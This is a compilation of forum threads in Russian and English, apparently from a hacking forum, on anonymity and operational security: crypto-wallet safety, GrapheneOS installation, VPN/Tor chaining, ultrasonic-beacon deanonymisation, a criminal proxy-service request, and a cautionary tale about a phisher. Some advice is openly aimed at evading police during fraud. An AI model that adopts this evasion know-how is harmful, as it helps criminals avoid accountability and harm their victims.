В браузере для работы с криптой не используйте никаких левых расширений, так как они могут подменять адреса для отправки/получения криптовалюты, а также делать переадресацию на фишинговые сайты.
Если вы используете Google Chrome на вашем личном ПК и в настройках указано, что он управляется вашей организацией - велика вероятность, что ваш браузер заражён. Антивирус вряд ли поможет. Дополнительными признаками заражения являются всплывающие окна и реклама:

![](/proxy.php?image=https%3A%2F%2Fcomp-security.net%2Fwp- content%2Fuploads%2F051319_1053_1.png&hash=929bc3dcf0de2b06f8a596e94772c65d)
Устранение:

Создайте отдельные аккаунты для чтения чатов/каналов в том числе. Перенесите всё, что связано с криптой на отдельный аккаунт/ы. На нём не должно быть компрометирующих данных: имя, фото, номер, никнейм.
В идеале иметь второй ПК для работы с финансами, но мы остановимся на базовом решении – отдельный аккаунт/профиль/браузер с выключенными автосохранением данных и рекламой(нередко вредоносной). Для отключения рекламы можно использовать AdBlock.
Используйте хороший зарубежный сервис VPN/прокси, поисковик, который не отслеживает историю - это полезно и приятно. А если отказаться от Google вы не можете, всегда проверяйте адрес сайта рядом с которым стоит пометка реклама. Для посещения постоянных сайтов создайте уже наконец закладки

Всегда проверяйте адрес для приёма/отправки средств через CTRL+F.
Не используйте публичные сети Wi-Fi. Злоумышленник может перехватить данные вашего браузера или подменить страницу биржи, где вы введёте, например, email, пароль, а затем и 3 кода – всё эти данные он перехватит и введёт на настоящей странице авторизации биржи. Не забываем о том, что на Binance по-прежнему можно купить NFT без всяких подтверждений. Злоумышленник может купить на ваши деньги собственный NFT и получить их на аккаунт своего дропа.
Не оставляйте устройство без присмотра, не используйте разблокировку по отпечатку/лицу или Bluetooth. Помните, что безопасность и удобство зачастую на разных полюсах. Соответственно, разблокировка вашего кошелька на телефоне должна быть только по паролю.

Безопасность в мессенджерах и реальной жизни

Не стоит делиться скриншотами баланса. Если я вижу на вашем скриншоте 900,4582 ETH, скорее всего я смогу по холдерам в эксплорере блокчейна быстренько найти ваш адрес. Высока вероятность, что ни у кого больше нет такой суммы в данный момент. А если и есть, можно нехитрым методом поиска в групповом чате или СИ уточнить, какие ещё валюты вы храните и сколько.

Устранение:

Не публикуйте точное значение баланса. То же самое касается и NFT – не показывайте #ID NFT или саму картинку – это может позволить однозначно определить адрес вашего кошелька,баланс, а это первый шаг к вашей деанонимизации.
Не сообщайте адреса своих кошельков, даже старых, потому что вы могли проколоться. Потенциальными злоумышленниками могут оказаться дальние родственники или просто завистливые незнакомцы/знакомые.
Не стоит распространяться о своих успешных/неудачных кейсах в крипте, так как это повышает риск целевой атаки на вас посредством шантажа/давления/взлома. Как бы не хотелось. Девочкам и суши про источник дохода знать необязательно.
Отключите автозагрузку медиа в мессенджерах, включите автоматические удаление кэша через 3-7 дней.
НИКОГДА не открывайте ссылки в личных сообщениях в Discord, Telegram, других соц. сетях/мессенджерах/почтовых сервисах,через которые вы занимаетесь криптой.
Осторожнее с файлами, в том числе от знакомых людей, так как они могут стать жертвой злоумышленника или втираться к вам в доверие. Стоит открывать файлы только в облаке, по ссылке. Проверяйте адрес ссылки, ведь можно скопировать любой сайт. И помните, что заливая файл на облачное хранилище, вы соглашаетесь с тем, что файлы больше не принадлежат вам.

Понимание устройства DeFi

Отключение расширения-кошелька от сайта не означает, что вы "в домике", ведь аппрувы то остались! Об этом мы говорили в мифах про безопасность (относится к EVM-блокчейнам).
Устранение:

Тестируйте новое бесплатно или на небольшие суммы: при работе с новыми инструментами есть риск безвозвратно потерять свою криптовалюту. Лучше всего знакомиться с новыми инструментами на тестнетах/в тестовой сети, либо, если это невозможно, совершать транзакции на небольшие суммы, чтобы убедиться, что вы действуете верно и понимаете, как работает новый инструмент.
Отозвать бесконечные аппрувы на сайтах, как бы вы им не доверяли. Для эфира есть Etherscan - официальный инструмент. Для остальных EVM блокчейнов аппрувы можно отзывать вручную, взаимодействуя со смартконтрактом на странице эксплорера, либо, используя на свой страх и риск Revoke.Cash и DeBank
**Не храните “ обёрнутые/wrapped ” монеты: **в чем проблема таких монет? Если взломают мост и украдут все средства, то ваши обернутые монеты превратятся в фантики, потому что их обеспечение в виде заблокированных в мосте монет исчезнет, также есть риск депега. Обёрнутой монета становится тогда, когда вы перегоняете её по мосту с родного блокчейна на другой. Когда это происходит, монеты блокируются мостом на родном блокчейне. А на том блокчейне, куда вы ее переводили, вам выдаётся аналогичное количество "обёрнутых" монет, которые являются токенами.

Хранение паролей и сид-фразы на устройстве с интернетом

Так где же тогда хранить свои пароли и ключи? Есть 3 варианта, но прежде, чем мы к ним перейдём, досконально изучите устройство их работы:

Специализированный софт - менеджеры паролей с открытым исходным кодом KeePass и Bitwarden
Криптоконтейнеры - это такой скрытый раздел на вашем диске/флешке, для доступа к которому нужно открыть заранее заданный файл и ввести пароль. Подробнее об этом, возможно, поговорим чуть позже, а пока - видео. Если вы плохо понимаете, как это работает - не используйте данный метод.
Аппаратный менеджер паролей, например, от Trezor: тык - видео
Дополнительные советы и инструменты:
1 сервис/сайт = 1 уникальный пароль. Чтобы элементарно защитить себя от подбора пароля в будущем при очередной утечке данных сервиса/по вашей вине. Можете воспользоваться генератором паролей и не забывайте регулярно обновлять пароли на ключевых сайтах и сервисах.
Можете использовать VirusTotal для проверки любых ссылок или файлов на вшитые вирусы. Для удобства есть и телеграм боты, но рабочих временно нет.
На ваши кошельки будут активно засылаться скам-токены/NFT. Не стоит заходить к ним на сайт и тем более пытаться их продать. Это может привести к полной потере средств. Сегодня большинство проектов просят вручную получить свою награду, то есть зайти на сайт и заклеймить. Проверяйте, совпадает ли адрес контракта токена/NFT, указанный в официальных источника с тем, что вы пытаетесь заклеймить.
Свой старый телефон можно использовать как хранилище паролей, кодов аутентификации Google и приёмник смс. Никто не должен знать ваш номер и про существование этого телефона. Не забываем заряжать и делать резервные копии.
Никому не передавайте сид-фразу, храните её в разных местах, имейте резервные копии и обучите основам блокчейна ваши доверенные лица на случай форс-мажора.
Используйте только почтовые сервисы от Google/ProtonMail. Можно создать до 4-5 Gmail на один номер. Не используйте для этого виртуальные номера.
Почта, которую вы используете для паролей нигде не должна палиться, содержать в себе ваше имя/никнейм и использоваться для общения с кем-то.
Рекомендации:
-отдельные почта+номер+аккаунты для социальной жизни
-отдельные почта+номер+аккаунты для криптовалютных активностей
-отдельные почта+номер+аккаунты для абуза и других сомнительных активностей

Чек-лист по безопасности на централизованных биржах

Разберём шаги, которые можно применить на самой популярной бирже Binance:

 * Установить уникальный сложный пароль и регулярно обновлять его: если при авторизации на бирже используете смс - отключите возможность [восстановления](https://www.vedomosti.ru/society/news/2021/08/06/881121-moshennichestva-pomoschyu-sim-kart) вашей сим-карты по доверенности. Тогда злоумышленники не смогут использовать поддельную доверенность для восстановления доступа к вашим аккаунтам. Никогда не используйте для авторизации лишь смс.
 * [Установить двухфакторную аутентификацию(2FA)](https://academy.binance.com/ru/articles/binance-2fa-guide)
 * [Установить антифишинговый код для почтовой рассылки](https://academy.binance.com/ru/articles/anti-phishing-code): нужен для того, чтобы вам не подкинули вредоносную ссылку в почте. Теперь каждое письмо от биржи будет сопровождаться вашим кодовым словом в шапке. Всё остальное - [фишинг](https://academy.binance.com/ru/articles/what-is-phishing)
 * [Использовать белый список адресов](https://academy.binance.com/ru/articles/withdrawal-address-whitelist): после включения вывод с биржи будет доступен только на указанные адреса, в указанных сетях. Вывод на новые адреса в списке будет заблокирован на 24 часа.
 * Не храните все средства на бирже: ваша крипта вам не принадлежит, пока не поступит на кастодиальный кошелёк. в лучшем случае вы потеряете время, а в худшем - всё. Случиться может что угодно: скам или взлом биржи, технические неполадки биржи/блокчейна, недостаток фактической ликвидности криптовалюты и как следствие - задержки с выводом. А ещё ваши деньги могут быть заморожены службой безопасности(нередко случается с теми, кто использует миксеры и другие изощрённые способы ввода/вывода)

На этом всё. Холодное хранение и меры безопасности для продвинутых ожидайте в следующей части

(COPYPAST)

GrapheneOS

ID: 676533bbb4103b69df371a16
Thread ID: 96479
Created: 2023-08-24T17:23:08+0000
Last Post: 2023-09-01T17:20:22+0000
Author: Knew100
Prefix: Статья
Replies: 44 Views: 2K

GrapheneOS - это приватная и безопасная мобильная операционная система с большой функциональностью и удобством использования. Он начинается с сильной базовой линии Android Open Source Project (AOSP) и вносит существенные улучшения как в конфиденциальность, так и в безопасность благодаря множеству тщательно разработанных функций, созданных для защиты от различных атак.

Рассмотрим основные решения в области улучшения безопасности и конфиденциальности:

Уменьшение поверхности атаки

Значительно сокращена площадь различных атак за счет избавления от ненужного кода, добавления дополнительных функций и отключения некоторых интерфейсов по умолчанию (NFC, Bluetooth и т.д.), когда экран заблокирован (подключение новых периферийных устройств USB, доступ к камере) и при отсутствии активного соединения (Bluetooth, Wi-Fi)

Защищенная среда выполнения приложения

Безопасная система создания приложений, позволяющая избежать совместного использования адресного пространства, макета и других секретов между приложениями

Модифицированный libc , обеспечивающий защиту от уязвимостей класса memory corruption

Собственный усиленный malloc (hardened malloc), использующий современные аппаратные возможности, чтобы обезопасить от уязвимостей класса heap memory corruption, наряду с сокращением срока службы конфиденциальных данных в памяти. Проект “hardened malloc” переносится на другие операционные системы на базе Linux, ориентированные на безопасность, такими как Whonix и ядро Linux hardened. Hardened malloc также сильно повлиял на архитектуру malloc следующего поколения, которая обеспечивает существенно большую безопасность, чем предыдущий malloc от musl, при этом сохраняя минимальное использование памяти и размер кода.

Защищенный набор инструментов компилятора

Защищенное ядро

Ограничение доступа к файловой системе

Улучшенная изоляция компонентов:

GrapheneOS улучшает "песочницу" приложений за счет модификации политики SELinux и seccomp-bpf, а также всех компонентов, таких как ядро. Улучшены другие "песочницы", включая прямые улучшения в них для рендеринга веб- браузера, используемых по умолчанию как для него, так и для механизма рендеринга WebView, предоставляемого ОС и используемого огромным количеством других приложений.

Улучшенная доверенная загрузка с улучшенными свойствами безопасности и уменьшенной поверхностью атаки

GrapheneOS закрывает лазейку, из-за которой компоненты системных приложений, могут быть понижены до более старой версии из-за того, что версия API не увеличивается при их обновлении в рамках изменений в ОС.
Аппаратная проверка и мониторинг безопасности с помощью приложения Auditor и службы сертификации

GrapheneOS включает исправления для большого количества уязвимостей, которые еще не исправлены в Android.

С обновлениями устанавливаются версии ядра Linux LTS на устройства с поддержкой GKI (Generic Kernel Image), включая телефоны Pixel 6-го и 7-го поколений. На момент написания статьи GrapheneOS использует последнюю версию Linux 5.10 GKI LTS (5.10.161). Стандартная ОС Pixel установлена на Linux 5.10.107 с небольшим количеством исправлений. Это означает, что GrapheneOS предоставляет сотни соответствующих улучшений ядра еще не включенных в стандартную ОС.

Возможность отключения доступа к сети для конкретного приложения (системный firewall):

GrapheneOS добавляет встроенный firewall для запрета доступа к любой из доступных сетей. Локальная сеть устройства (localhost) защищена тем же способом. Firewall не дает приложениям использовать сеть через API.

Чтобы избежать несовместимости с приложениями Android, добавленный firewall включен по умолчанию. Однако пользовательский интерфейс установки приложения OS отображает переключатель как часть страницы подтверждения установки, чтобы пользователи могли отключить его.

Переключатель разрешения датчиков

Переключатель разрешений датчиков позволяет запретить доступ ко всем датчикам, не охватываемым существующими разрешениями Android (камера, микрофон, распознавание активности и т.д.), включая акселерометр, гироскоп, компас, барометр, термометр и др., присутствующие на данном устройстве. Когда доступ отключен, приложения получают обнуленные данные при проверке значений датчиков. GrapheneOS создает легко отключаемое уведомление, когда приложения пытаются получить доступ к датчикам, заблокированным из-за отсутствия разрешения. Это делает функцию более удобной, поскольку пользователи могут определить, пытается ли приложение получить доступ к ней.

GrapheneOS предоставляет области хранения в качестве альтернативы стандартной схеме. Вместо предоставления разрешений на хранение данных пользователи могут включить области хранения, то есть приложение может создавать файлы/каталоги в домашнем каталоге пользователя, но получает доступ только к файлам, которые оно создало само. Но пользователи могут добавлять файлы и каталоги в качестве областей хранения, предоставляя приложению доступ к файлам, созданным другими приложениями.

Режим «только LTE» для уменьшения поверхности атаки сотовой радиосвязи за счет отключения огромного количества как устаревшего кода (2G, 3G), так и нового, не везде используемого кода (5G).

Конфиденциальность Wi-Fi

GrapheneOS поддерживает рандомизацию MAC для каждого соединения и включает ее по умолчанию. Это более приватный подход, чем стандартный постоянный случайный MAC для каждой сети, используемый современным Android.

Когда используется рандомизация MAC для каждого подключения, добавленная GrapheneOS, состояние DHCP-клиента сбрасывается перед повторным подключением к сети, чтобы избежать обнаружения, что это, скорее всего, то же устройство, что и раньше.

На Android каждый снимок экрана также содержит метаданные с указанием локальной даты, времени и часового пояса. GrapheneOS отключает это по умолчанию, чтобы избежать утечки информации о времени и местоположении через них, так как не видны пользователю. Дата и время уже включены в название файла скриншота, который виден пользователю и может быть легко изменен.

GrapheneOS устраняет несколько утечек идентификаторов устройства, чтобы приложения не могли однозначно его идентифицировать.

GrapheneOS не включает и не использует приложения и сервисы Google по умолчанию и любых других приложений/сервисов, которые не соответствуют политике конфиденциальности и безопасности. Приложения и сервисы Google можно использовать на GrapheneOS как обычные изолированные приложения без какого- либо специального доступа или привилегий через изолированную среду.

Это основные улучшения системы, которые реализованы в GrapheneOS, на самом деле их немного больше, но я описал самые важные, таким образом можно сделать вывод, что если вы хотите получить наиболее безопасное мобильное устройство, то используйте GrapheneOS

В данной статье уже рассмотрим процесс её установки. У GrapheneOS есть 2 варианта установки: через терминал и через веб-установщик, мы будем ставить именно через веб-установщик, потому что это гораздо проще и быстрее.
В качестве системы, с которой будет производиться установка будет использован Debian 12 и браузер Chromium, использовать будет веб-установщик

Для начала надо подготовить сам устройство.
Первым делом необходимо включить опции для разработчиков, для этого открываем настройки устройства, там заходим в " About phone" и несколько раз нажимаем на** "build number"**, пока не появится сообщение о том, что режим разработчика активирован.

Затем переходим в пункт** "System"**, а там в пункт **" Developer options" **и включаем опцию " OEM unlocking", при этом смартфон должен быть подключен к интернету!

Теперь надо установить необходимые драйвера на ПК, для этого в терминале вводим команду

Код:

sudo apt install android-sdk-platform-tools-common

Теперь выключаем устройство и включаем его одновременно зажав кнопку включения и уменьшения громкости, таким образом мы загрузимся в режиме fastboot и увидим надпись о том, что загрузчик заблокирован

Подключаем смартфон к ПК в таком режиме и открываем сайт https://grapheneos.org/install/web

На сайте нажимаем кнопку " Unlock bootloader"

На устройстве кнопками громкости выбираем пункт " Unlock the bootloader" и нажимаем кнопку включения, после этого устройство перезагрузится и мы увидим, что загрузик разблокирован

Теперь на сайте нажимаем кнопку** "Download release"** и ждем окончания загрузки прошивки

После завершения загрузки нажимаем кнопку " Flash release", после этого пойдет процесс прошивки устройства, оно несколько раз перезагрузится и потом снова войдет в режим fastboot

Прошивка завершена, теперь заблокируем загрузчик, для этого нажимаем на сайте кнопку " Lock bootloader", выбираем** "Lock the bootloader"** на устройстве и жмем конпку включения, устройство перезагрузится и мы увидим, что загрузчик снова заблокирован

Теперь можно включить устройство и пользоваться, GrapheneOS установлена

Отключите отладку по USB и OEM разблокировку (если она включена), доступ в интернет давайте только тем приложениям, которым он необходим

С макбука точно так же, учитывайте, что браузер, через который пойдет установка, должен быть на движке Chromium

Definition of simple OpSec

ID: 676533bbb4103b69df371a1b
Thread ID: 90216
Created: 2023-06-11T11:01:08+0000
Last Post: 2023-08-28T17:25:32+0000
Author: Backstab
Prefix: Статья
Replies: 20 Views: 2K

This topis is very common and people help each together for this reason I want too give you my experience and knowledge how I am more than few years safe without any compromised account or etc
like first in long term you will need Linux ( there some people who use Tails but I think you need to use Linux on hard disk ) dual boot

reason why in long term you be gathered files,knowledge,sources and etc so for this reason
look don't take me wrong but Tails is primary for Journalist which live without freedom to speech,like use Tails when you must just few times its okay,but in long term, I am not sure ( that's only my opinion )

When you use Virtual machine likes ( Oracle VM ) better is always keep that on QEMU/KVM

Encrypt hard disk again common step but many people don't take it seriously,for example my LUKS password have over 24-32 characters,special symbols,numbers
this password I don't have written somewhere on piece of paper or before used,I have it only at my mind

I recommend you use password for example to easy remember "yourFavoriteSong@669myAnotherfavoriteSong#669" example
there is not important which distro you choice like means Debian ( kali parrrot,linux mint and etc ) or arch

----------------------------------------------------------------------

I don't be talk about VPN you re know at this moment its best Mullvad but still keep on your mind never trust VPN provider
for this reason I used "USB TETHERING" i have rooted phone,custom rom and on setting I "allow client to use VPN"

so for example on phone I running IPVANISH which give me over USB TETHERING internet and on Linux I running Mullvad
without any knowledge or experience and ricing you have connection over two separated vpn providers

you can still use tor-socks,always when I connect to ssh,rdp or everything what could be dangerous for me I use tor-socks here few examples
vpn---- >vpn---->tor socks ( for that paranoid guys )
vpn---->tor socks ( use always where could be something compromised )
vpn---> ssh ( personally I don't use or recommend )

Prefer to run application and etc over proxychains than setup it manually on Telegram for example ( there you have some logs what i get when i use proxychains ----> Telegram )

[proxychains] Strict chain ... 127.0.0.1:9050 ... firebaseremoteconfig.googleapis.com:443 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 149.154.175.53:443 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 149.154.175.53:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... google.com:443 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 149.154.175.56:443 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... mozilla.cloudflare- dns.com:443
[proxychains] Strict chain ... 127.0.0.1:9050 ... firestore.googleapis.com:443

Interesting how Telegram communicate with google dns server or even mozzila cloudflare

----------------------------------------------------------------------

Personally on each site like xss.is and etc,used different password,you can "pwgen" ( sudo apt install pwgen or sudo pacman -S pwgen )

[backstab@tor-browser]$ pwgen
aico5eRe ohDeex3E aY6TiH7o iole8ohH aepei9Tu le3Up1Ae sa2ahPha tiu8chaR
oov6ooK3 Ejeigh9o theeNgi9 Aithag6u Caequ3ua iun5veTa ai9oKeim mue3Jueb

You can see its generate bunch of password,you cannot remember it that obviously but you can make PGP ( for example with same pass which you use for hard disk LUKS )
and you can keep your password storage secured and nobody else cannot read that without your PGP and password

------------------------------------------------------------------------------------

Shits like never trust anyone,don't say where you live or even your age I think its obviously never specified your real personal info, nobody never have reason to know it
thats all like i said its just basic and definition of opsec in pocket,be safe

------------------------------------------------------------------------------------

**Remember you cannot trust to Microsoft which on newest Windows 11 make from this Operating system total spyware,same Windows 10 and etc
you cannot trust to Google and Android phone same like,you cannot trust to iPhone and they security features

everything what is close source is dangerous
for example I have rooted phone,custom rom,without gapps and Google still pinging my device,how that's possible without any google frameworks and etc

always work just on Linux don't work over phone and etc
better is be paranoid and think about everything what could possible to happened than even once get on trap and paid with your time**

Hardening Arch Linux

Sandboxes allow you to run a program in an isolated environment that has no, or limited access to the rest of your system. You can use these to secure your applications or run untrusted programs.
I recommend to use bubblewrap to sandbox programs. It is a very powerful sandbox with minimal attack surface.

You should not use Firejail as it has far too large attack surface which has led to Firejail having trivial privilege escalations and sandbox escapes.

Virtual Machines
Virtual Machines (VMs) isolate processes by virtualizing an entirely new system. I recommend to use KVM/QEMU.

You should not use Virtualbox for multiple reasons.

They use a non-free toolchain to compile their BIOS which is problematic for some free software projects.
They don't fix security bugs. Many bugs are left in because the developers are too lazy to fix them.
They rarely tell people about bugs. If they discover a bug they hide it from everyone else which makes it a lot harder for the community to make patches.
A lot of important features only come with the extension pack which is proprietary.

KVM is a kernel module that allows the kernel to function like a hypervisor.

QEMU is an emulator that can use KVM.
Virt-manager and GNOME Boxes are both good and easy to use GUIs to manage KVM/QEMU virtual machines.

Transparent Proxy
You can configure your whole system to use Tor by default with a transparent proxy to anonymize all internet traffic.

To do this add this to /etc/tor/torrc:

TransPort 9040
DNSPort 5353
SocksPort 9050

Link to full Hardening ----> https://theprivacyguide1.github.io/linux_hardening_guide

Cross-device tracking. Деанонимизация Tor, VPN, proxy при помощи звуковых маячков

ID: 676533bbb4103b69df371a1d
Thread ID: 27206
Created: 2019-01-09T14:09:01+0000
Last Post: 2023-08-27T10:48:37+0000
Author: tabac
Replies: 5 Views: 2K

Cross-device tracking. Деанонимизация пользователей Tor, VPN, proxy при помощи звуковых маячков.

Cross-device tracking – тип атак, представляющих возможность отслеживать пользователя параллельно через несколько устройств. Это давняя мечта маркетологов, однако не только маркетологам понравилась эта технология: она оказалась эффективной при деанонимизации киберпреступников, использующих для сокрытия подлинного IP-адреса Tor, VPN и proxy.

В данной главе я расскажу о звуковых маячках – очень опасной атаке типа cross- device tracking, позволяющей деанонимизировать пользователей VPN, Tor или proxy, даже если последние все делают правильно. Вам не нужно лезть в дебри технических знаний, вы должны понять лишь принцип ее работы и методы защиты.

Наверняка вы сталкивались с социологическими опросами, когда вам звонят домой и спрашивают, смотрит ли кто-нибудь сейчас телевизор и если да, уточняют, какой канал. Таким образом обзванивается, например, 1000 человек и рассчитывается процентное соотношение. Это нужно каналам, чтобы, во-первых, понимать интересы аудитории, а во-вторых, охват – это важно для продажи рекламы.

Важно это и маркетологам, чтобы точнее подбирать время заказа рекламы и оценивать объем просмотров заказанной рекламы. Однако этот способ получения данных дорог, имеет высокую погрешность и относительно малый охват.

А представьте себе, что ваш голосовой помощник в телефоне, который, как вы наверняка могли убедиться, прекрасно понимает живую речь, будет прослушивать периметр и определять, какой канал вы сейчас смотрите. Для этого реклама на канале будет содержать фразы-маячки (например, будет звучать «реклама на Первом федеральном»), которые телефон ловит, а затем отсылает на сервер информацию, что сейчас вы смотрите определенный канал или слушаете такую-то радиостанцию.

Это дешевая и эффективная технология, но инженеры хотят сделать ее еще совершеннее и использовать звуковые сигналы, которые не способен распознавать слуховой аппарат человека. Судя по выступлениям, инженеры неплохо преуспели в этом. Но мы не курс по маркетингу, и эта технология интересует нас исключительно как инструмент деанонимизации.

Сайт открылся – и хакер спалился

Представьте себя очень опасным хакером, которого разыскивает ФБР. Вы заходите на сайт-ловушку, подготовленный специально для вашей поимки. Это абсолютно безвредный сайт, никаких атак он производить не станет, это может быть даже страничка популярного сайта, владелец которого совместно с ФБР создаст ее для вас.

Вы спокойно путешествуете по сайту, простой атакой вас не взломать, вы хорошо подумали о безопасности и используете Whonix. Это действительно очень хорошая защита от способов активной деанонимизации. И вот вы заходите на сайт и слышите звук, но ничего подозрительного и опасного не происходит. Даже если вы что-то заподозрите и закроете сайт, ничего уже не изменить.

Этот звук слышит ваш телефон, и для него это сигнал. Предположим, разработчик голосового помощника на вашем мобильном устройстве или одного из приложений, имеющих доступ к микрофону, сотрудничает с ФБР. Данные о получении сигнала будут незамедлительно переданы устройством на сервера вместе с координатами и IP-адресом.

Да, на компьютере у вас стоит Whonix, но маловероятно, что и ваш телефон защищен столь же надежно. Вы все делали правильно, просто учли не все. Если вам когда-нибудь потребуется ноутбук с максимальной безопасностью, необходимо отключить звук, лучше паяльником, но можно и при помощи настроек. Мы уже давали подобную рекомендацию в главе о другой угрозе – прослушке через динамики и колонки.

Совет

При настройке максимальной анонимности отключите динамики, и лучше на уровне проводов.
Второй совет вам понравится меньше: если вы Эдвард Сноуден и вас активно разыскивает ФБР, вам стоит отказаться от смартфона. Используйте простой кнопочный телефон либо специальный телефон, ориентированный на безопасность, с сильно ограниченным функционалом и списком установленных приложений. Это же касается и планшета.

Совет

Откажитесь от смартфона либо используйте специальные модели устройств, ориентированные на безопасность.
А если вы простой пользователь и хотите настроить свою безопасность без необратимой потери звука, в главе о настройке браузера мы настроим ограничение воспроизведения звуков. Это хотя и базовая, но надежная защита от деанонимизации при помощи звуковых маячков.

Совет

Настройте ограничение воспроизведения звуков в браузере.

Почему эта атака так эффективна

Обычно деанонимизация предполагает получение подлинного IP-адреса, и из этой главы вы знаете, как не просто бывает по IP-адресу установить личность, особенно если киберпреступник находится в другой стране.

В случае cross-device tracking телефон может отправить всю информацию на блюдечке: и координаты, и номер телефона, и контакты в адресной книге, и аккаунт Google/Apple, и историю звонков/СМС, и список используемых Wi-Fi – этого более чем достаточно для установления личности.

А работает ли способ деанонимизации при помощи звуковых маячков

Работает. По данной ссылке вы можете посмотреть демонстрацию деанонимизации пользователя Тор при помощи cross- device tracking, причем в данном случае используются не слышимые для человеческого уха звуки.

Paranoid II — курс по анонимности и безопасности (2020)

ID: 676533bbb4103b69df371a1f
Thread ID: 48639
Created: 2021-02-25T19:15:43+0000
Last Post: 2023-08-25T19:07:38+0000
Author: balabashka
Replies: 7 Views: 2K

Название: Paranoid II — курс по анонимности и безопасности (2020)

Автор: Codeby

Курс по анонимности и безопасности в сети интернет
Paranoid II
Твоя безопасность и свобода
Paranoid II — логическое продолжение курса по анонимности в сети Paranoid

Инструктор: ghost
О чем курс: о комплексе мер по защите информации, конфиденциальности, защите персональных данных, анонимности в интернете и не только ...;
Для кого этот курс: для людей, нуждающихся в высокой степени конфиденциальности и защите информации;
Предоставим: доступ к видео и текстовым материалам, а так же персональные консультации в рамках курса;
Что еще: практические задания к каждому уроку.

Настройка рабочего окружения. Улучшенная и переработанная работа с виртуальными машинами (пожалуй, единственная аналогия с предыдущим курсом);
Тонкая работа с разными криптовалютами;
Выбор, аренда, администрирование и защита VPS (70% работы в курсе проходит на серверах);
Подъём и настройка сервисов на VPS и работа с ними;
Тонкая работа с Tor-сервисами;
Выжимаем максимум из Raspberry Pi;
Анонимные роутеры;
Подъём, настройка и администрирование Tor-ноды;
Работа с железом ПК. Удаление аппаратных закладок;
Минимизация рисков и... авторские разработки.

Старт обучения 1 января 2020 года
**Необходимое требование: вы прошли первую часть курса Paranoid

[Продажник](https://codeby.net/threads/paranoid-ii-kurs-po-anonimnosti-i- bezopasnosti.69596/)

Скачать**

Анонимность и безопасность оффлайн

ID: 676533bbb4103b69df371a31
Thread ID: 84172
Created: 2023-03-20T15:04:00+0000
Last Post: 2023-08-02T11:40:48+0000
Author: gliderexpert
Replies: 38 Views: 2K

Кидайте сюда самые параноидальные предложения по теме анонимности в оффлайне.
Допустим, начнем с простого - есть задача, анонимно проехать из пункта A в пункт Б, находящийся допустим в пределах одной области (границы пересекать не надо).
Вводная #2 - расстояние довольно большое. Т.е. варианты типа пешком/велосипед/электросамокат - не подходят.

Понятно что тлф выключен (вынут акб) или отсутствует. Личный транспорт - не подходит (распознавание номеров).
Такси вызванное с левой симки - риск что в салоне будет видеосъемка, подключенная к какой нибудь системе типа findface (например камеры signalQ2).
Общественный транспорт - те же камеры с распознаванием лиц. Личный транспорт без номеров - вариант, но до первой остановки гайцов - даже если им занести денег они все равно вбивают личные данные для проверки в БД, и естественно место/время проверки этих данных остается в логах БД. Вариант глушения связи чтобы они не могли воспользоваться планшетом для пробива - срабатывает не всегда.
Решения типа blablacar - видеорегистраторы + трекинг попутчиков по их телефонам...

Собственно, что делать и имеет ли вообще решение данная задача?

Помощь с настройкой Whonix в России

ID: 676533bbb4103b69df371a39
Thread ID: 90165
Created: 2023-06-10T15:36:35+0000
Last Post: 2023-07-19T04:27:20+0000
Author: ofkofkbtw
Replies: 26 Views: 2K

Живу в россии, все впны блочат , whonix настраиваю по статье threads/54947/
в Whonix-Gateway при подключении зависает на 5%
нужна помощь , в идеале хочу прокинуть +- безопасную связку но не получается.

Luxsocks, обсуждение

ID: 676533bbb4103b69df371a3c
Thread ID: 62962
Created: 2022-02-14T15:15:31+0000
Last Post: 2023-07-14T16:06:12+0000
Author: AK-74M
Replies: 30 Views: 2K

Hello, i lost a lover luxsocks. Any similar platforms or recommendations with functionalities?
I know about vip72 and 911 but none of those compare to the former.

Also who knows which provider this is below? Thanks in advance! Screenshot 2022-02-14 at 10.11.46 AM.png

Напутствие детям.

ID: 676533bbb4103b69df371a46
Thread ID: 91240
Created: 2023-06-24T06:40:13+0000
Last Post: 2023-07-06T10:19:58+0000
Author: R00T BL4ZE
Replies: 37 Views: 2K

Приветствую форум!

Анонимность. Как вы можете говорить о ней, когда вся ваша защита стоит на vpn и транзакциях биткоинами?)
Мне хочется залиться смехом, когда я слышу, как человек с серьёзным лицом пытается мне доказать, что его не найдут, защитив себя vpn(или прокси),
который он оплатил биткоинами, а еще лучше с маминой карты) Я объясню понятным языком, ведь сомневаюсь, что среди читателей основная масса - взрослые.

Разберём простую ситуацию.
Сотрудник маленькой it компании, в своё время, не очень хотел учиться.
Его не привлекали знания, и вся его жизнь переплеталась с влажными мечтами о крупных деньгах. Его развитие строилось на базе 11 класов и универе,
где он запомнил, как писал сайты. На работе же, дела его шли скудно, компания была близка к провалу и наш герой (назовём его NN) не был доволен заработком в 30.000 Р.
Проводя очередной вечер в сопровождении бутылки хмельного и деградации в Тик- Ток, его спокойствие нарушил владелец компании, сообщив о разорении компании,
расформировании сотрудников и объявил неоплачиваемый отпуск. NN понял, что компания потерпела крах. Увидев, что на счёте в банке, осталось 15000, он судорожно
начал водить пальцами по экрану телефона в поисках новой работы. Просидев так до утра, с NN обещало связаться 2 работодателя, но деньги нужны были сейчас.
NN, вспомнив, что умеет писать сайты, начинает познавать себя в фишинге. Узнав, что на этом можно быстро заработать, герой отправляется работать над своей идеей.
Он начал пылать, словно топь печи паровоза, представляя, что вчера он был клерком, а через неделю будет миллионером.
Потратив несколько суток на разработку своего проекта, перед публикацией необходимо было познать анонимность и NN это понимал.
Герой был настолько спокоен за себя, увидев в интернете анонимные криптовалюты и биткоины и принялся пополнять свой новый аккаунт в биткоинах.
NN-у требовалось оплатить сервера и хостинг, купить vpn, нагнать траффик, с чем помог его сосед, который имел многомиллионную аудиторию в телеграм-канале.
Оплатив нужный софт, расходники, и подняв фишинг, "клиенты" полились рекой. Именно так он называл тех, кто попадался на его фишинг.
С деньгами стало полегче, но, через пару дней, к нему постучался майор Доигралес. В чём же причина?

Причин могло быть много. Будем разбирать всё по порядку.

1.Анонимность криптовалют.
Криптовалюты, действительно анонимны, так как зачастую не имеют конкретной привязки к личности. А вот то, как мы получаем эти криптовалюты, вопрос другой.
Используя обменники валют, герой использовал свою банковскую карточку. Криптовалюты имеют идентификационный номер(не все). В данном случае, биткоин точно имеет)
